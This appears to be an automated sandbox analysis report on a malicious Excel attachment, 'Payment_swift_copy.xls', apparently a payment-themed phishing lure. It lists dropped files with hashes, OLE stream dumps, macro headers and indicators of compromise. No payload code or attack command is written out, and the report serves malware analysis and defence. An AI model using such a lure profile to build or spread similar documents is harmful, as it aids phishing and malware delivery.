            SHA-256:85BD4E681419A55E40D59598D8287A5CE7FDEDC7821DC9890DC74C5F8D57301B
            SHA-512:6BDE6D6E9DD44F1A5C43B25B6E96A6750D8A15659E678826E9C592EAA061D5B62A9C65B2F0E79E1444DED2C6844432B9B3F9A8C7EA7CF4307DB6D32AA63ABF26
            Malicious:false
            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/16/2024 09:05:24.290.EXCEL (0xA88).0x8CC.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":18,"Time":"2024-12-16T09:05:24.290Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T09:05:23.7597390Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T09:05:23.7597390Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-16T09:05:23.7597390Z\", \"C\" : \"\", \"Q\" : 8.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N\

            C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Primary1734339924280946700_98182420-D459-4EDE-B647-164EC7990E8A.log

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):20971520
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3::
            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\Primary1734340013816748900_06F6CC77-279A-49F0-A13B-293A9D9A52AD.log

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:ASCII text, with very long lines (28825), with CRLF line terminators
            Category:dropped
            Size (bytes):410322
            Entropy (8bit):5.284972274245398
            Encrypted:false
            SSDEEP:
            MD5:ECE9A36CCF631D1881BC2972ECF294FE
            SHA1:BA0F83CC4305B8EF879791931A5FC67FD077FCC4
            SHA-256:97B4AEE4E770E4054CA302C2258F3613AAADD59E4FB3484162649716D0A8CB6B
            SHA-512:C52C133B412AA71A5B9340822595F8E6BF29A44FE193A1F71BA41BB01154BFB7B9363B0FD0D3DD1F1DC6A43354B490F798905A2EBA90FE9CE2E0074C1943D7B4
            Malicious:false
            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/16/2024 09:06:53.888.EXCEL (0x1FFC).0x1998.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":25,"Time":"2024-12-16T09:06:53.888Z","Contract":"Office.System.Activity","Activity.CV":"d8z2Bpon8EmhOyk6nZpSrQ.1.12","Activity.Duration":14,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...12/16/2024 09:06:53.903.EXCEL (0x1FFC).0x1998.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":27,"Time":"2024-12-16T09:06:53.903Z","Contract":"Office.System.Activity","Activity.CV":"d8z2Bpon8EmhOyk6nZpSrQ.1.13","Activity.Duration":13081,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVersion"

            C:\Users\user\AppData\Local\Temp\~DF09428153E9B4179E.TMP

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):54272
            Entropy (8bit):7.354307290251543
            Encrypted:false
            SSDEEP:
            MD5:1DD99CE7B825B485B2B78247C67F72CB
            SHA1:ED2FF8C3C7163168B3C6999663C34891734109B3
            SHA-256:3C980F7F55B7814FB9ABCB8FE36CD83A1B564FA848F841CC8E24132B9EAB88F4
            SHA-512:58B018D5AF0D47F0F02BABD6F1F6A3668C70A56CF5BBB77630EF9ECF2DF985E7B93C73A29EF6852270BAC362578DDDACF792D68F6A4C725CE3345F8448A4BC73
            Malicious:false
            Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...........................................................................

            C:\Users\user\AppData\Local\Temp\~DF751F6CF890A39BEC.TMP

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):7.474866706028188
            Encrypted:false
            SSDEEP:
            MD5:E9AD01833E595CC919A3D742B6BE799F
            SHA1:144E84A5B416A4476D7243A68EB1E9AB4EA229BF
            SHA-256:58E0C3DFC389CB51C773EB541E1CBF5A51560038CAB3812F353EE5661E0536FA
            SHA-512:18B805196AC62459931EDD5BDFD329B23314650FB48105EFA5FA8DCC005B2FA340DB7A1950895EE421E86AFED98B47D02D23039AA4D19575CE5E5BF4AB8DD71F
            Malicious:false
            Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\~DFA5F447E89C4E72E0.TMP

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):208896
            Entropy (8bit):6.597108397381584
            Encrypted:false
            SSDEEP:
            MD5:0631D007CCFD86834640531620AC81D1
            SHA1:9646D9A4CABAB43514D8D95D81211FF01058C2A7
            SHA-256:5A0452312F3A425A2784A9E1DD52FCAC2F6108619C98472D12B3CA0D2374121D
            SHA-512:AF97BC09E30B00326A44E75755B5327064347C889334B7F9BE7E40E18ACE528026CBD9D2C91906F1159A502BB00CB39AFB4A0B9F3177AEB92D8E17418322C41E
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\~DFE30BBDF34376CF03.TMP

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\~DFFA23238C94CAD745.TMP

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:data
            Category:dropped
            Size (bytes):512
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:
            MD5:BF619EAC0CDF3F68D496EA9344137E8B
            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
            Malicious:false
            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\Desktop\CBD20000

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 09:06:52 2024, Security: 1
            Category:dropped
            Size (bytes):837120
            Entropy (8bit):7.630255694699776
            Encrypted:false
            SSDEEP:
            MD5:14DC76676888C05D8A484C93272C2275
            SHA1:CABF8D7383562CF74184EF00233590C90910AD9B
            SHA-256:5F14177B1F3CD030CEE5168526E36CA2FABE95C3723F49033A1548BEF9600563
            SHA-512:DF5DEE1D23B58F2A59E0D274AB5D413BD630D219B290958CA46D44A24345747B31D7BC0E54FE7E2DD696390B96C3D08BA404D35AAFDC0CB0754D2C9D8AA90822
            Malicious:false
            Preview:......................>...................................M...................P...Q...R...S...................=...>...Y...............................................................................................................................................................................................................................................................................................................................................................................................................O................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...........<.......................U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

            C:\Users\user\Desktop\CBD20000:Zone.Identifier

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0

            C:\Users\user\Desktop\Payment_swift_copy.xls (copy)

            Download File
            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 09:06:52 2024, Security: 1
            Category:dropped
            Size (bytes):837120
            Entropy (8bit):7.630255694699776
            Encrypted:false
            SSDEEP:
            MD5:14DC76676888C05D8A484C93272C2275
            SHA1:CABF8D7383562CF74184EF00233590C90910AD9B
            SHA-256:5F14177B1F3CD030CEE5168526E36CA2FABE95C3723F49033A1548BEF9600563
            SHA-512:DF5DEE1D23B58F2A59E0D274AB5D413BD630D219B290958CA46D44A24345747B31D7BC0E54FE7E2DD696390B96C3D08BA404D35AAFDC0CB0754D2C9D8AA90822
            Malicious:true
            Preview:......................>...................................M...................P...Q...R...S...................=...>...Y...............................................................................................................................................................................................................................................................................................................................................................................................................O................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...........<.......................U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

            Static File Info

            General

            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun Dec 15 15:10:21 2024, Security: 1
            Entropy (8bit):7.765557008278558
            TrID:
            • Microsoft Excel sheet (30009/1) 47.99%
            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
            File name:Payment_swift_copy.xls
            File size:1'096'192 bytes
            MD5:3c31b1b6455e98d02fde97673287f260
            SHA1:10eb67ae8645458996d5eeb3101504ceaf446d85
            SHA256:cf7373204fc102aa8f3d4ea5a8ac56db2d6227f0e9610c8089dfca7b3477034a
            SHA512:db1549e367557e2cb689972d39d79094e778cfa78302f5ecf42d94dd39ba9ab7a5ee31a2e03baa0d449302aad8dbe1044868ddb5c4403a055b52b1716a10f3ac
            SSDEEP:24576:KBaubARM8A+8Z+jSSs8eqdWUdt4IsOqAf:KWU+XjSS4quIP5
            TLSH:A33501E5B68D6B42C61A523471F7579E1714AC03D902423B37F877291BFBAD08A03F9A
            File Content Preview:........................>...................................J...................M...N...O...P...}...~...........:...;...V.......k.......m......................................................................................................................

            File Icon

            Icon Hash:35ed8e920e8c81b5

            Static OLE Info

            General

            Document Type:OLE
            Number of OLE Files:1

            OLE File "Payment_swift_copy.xls"

            Indicators
            Has Summary Info:
            Application Name:Microsoft Excel
            Encrypted Document:True
            Contains Word Document Stream:False
            Contains Workbook/Book Stream:True
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:True
            Summary
            Code Page:1252
            Author:
            Last Saved By:
            Create Time:2006-09-16 00:00:00
            Last Saved Time:2024-12-15 15:10:21
            Creating Application:Microsoft Excel
            Security:1
            Document Summary
            Document Code Page:1252
            Thumbnail Scaling Desired:False
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:786432

            Streams with VBA

            VBA File Name: Sheet1.cls, Stream Size: 977
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
            VBA File Name:Sheet1.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

            VBA File Name: Sheet2.cls, Stream Size: 977
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
            VBA File Name:Sheet2.cls
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

            VBA File Name: ThisWorkbook.cls, Stream Size: 985
            General
            Stream Path:MBD00CB2B2B/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
            VBA File Name:ThisWorkbook.cls
            Stream Size:985
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

            Streams

            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
            General
            Stream Path:\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
            General
            Stream Path:\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:244
            Entropy:2.889430592781307
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
            General
            Stream Path:\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:200
            Entropy:3.2820681057018666
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . [ u . O . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
            Stream Path: MBD00CB2B2A/\x1CompObj, File Type: data, Stream Size: 99
            General
            Stream Path:MBD00CB2B2A/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:99
            Entropy:3.631242196770981
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2A/Package, File Type: Microsoft Excel 2007+, Stream Size: 35949
            General
            Stream Path:MBD00CB2B2A/Package
            CLSID:
            File Type:Microsoft Excel 2007+
            Stream Size:35949
            Entropy:7.720440990481194
            Base64 Encoded:True
            Data ASCII:P K . . . . . . . . . . ! . . h . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 16 68 0b 00 bb 01 00 00 ed 08 00 00 13 00 e6 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e2 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/\x1CompObj, File Type: data, Stream Size: 114
            General
            Stream Path:MBD00CB2B2B/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:114
            Entropy:4.25248375192737
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
            General
            Stream Path:MBD00CB2B2B/\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:244
            Entropy:2.701136490257069
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
            Stream Path: MBD00CB2B2B/\x5SummaryInformation, File Type: data, Stream Size: 220
            General
            Stream Path:MBD00CB2B2B/\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:220
            Entropy:3.372234242231489
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
            Stream Path: MBD00CB2B2B/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
            General
            Stream Path:MBD00CB2B2B/MBD0018D4CE/\x1Ole
            CLSID:
            File Type:data
            Stream Size:20
            Entropy:0.5689955935892812
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . .
            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Stream Path: MBD00CB2B2B/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
            General
            Stream Path:MBD00CB2B2B/MBD0018D4CE/\x3ObjInfo
            CLSID:
            File Type:data
            Stream Size:4
            Entropy:0.8112781244591328
            Base64 Encoded:False
            Data ASCII:. . . .
            Data Raw:00 00 03 00
            Stream Path: MBD00CB2B2B/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
            General
